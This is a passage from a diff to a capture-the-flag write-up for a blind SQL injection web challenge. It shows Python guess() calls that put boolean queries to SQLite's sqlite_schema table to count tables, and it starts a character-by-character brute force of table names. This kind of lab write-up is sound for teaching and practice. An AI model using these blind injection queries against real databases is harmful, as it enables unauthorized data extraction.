0x-Matthias/CTF-Writeups/BlueHens_2023/web/Why lie: Blind SQL/README.md

 This looks like a random number, so let's explore the database even more.

 ### Exploring other tables
+At this point, we're using the meta table `sqlite_schema` to gain information about existing tables:

 After confirming the number of tables was bigger than `1`, we managed to fix the table count to `2`.
 ```python
 guess("SELECT 1 FROM numbers WHERE (SELECT count(*) FROM sqlite_schema) > 1") # True
 guess("SELECT 1 FROM numbers WHERE (SELECT count(*) FROM sqlite_schema) = 2") # True
 ```

-Now we have to find the name of the unknown table, which requires us to enumerate strings:
+Now we have to find the name of the unknown table, which requires us to enumerate strings; specifically the `name` column of the meta table `sqlite_schema`:
 ```python
 # Declare an alphabet for brute forcing strings:
 ALPHABET = [chr(x) for x in range(0x20, 0x7F)]